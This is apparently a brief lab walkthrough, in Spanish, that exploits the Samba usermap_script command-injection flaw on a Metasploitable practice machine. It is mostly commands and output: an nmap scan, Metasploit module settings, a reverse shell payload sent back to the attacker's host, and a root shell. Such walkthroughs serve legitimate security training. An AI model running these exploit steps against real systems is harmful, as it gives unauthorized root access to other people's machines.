# Metasploitable (samba)

Introducción

Samba: Remote Command Injection Vulnerability

Ejecución
# msfconsole
msf > nmap -sV -O -p 100-500 192.168.1.50
[*] exec: nmap -sV -O -p 100-500 192.168.1.50

Not shown: 399 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop

msf > search samba
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > set rhost 192.168.1.50
msf exploit(usermap_script) > set rport 445
msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(usermap_script) > set lhost 192.168.1.100
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo fXQUYEFiaAED6rM4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "fXQUYEFiaAED6rM4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.50:58167)
uname -a
Linux metasploitable 2.6.24-16-server i686 GNU/Linux
whoami
root

No comments: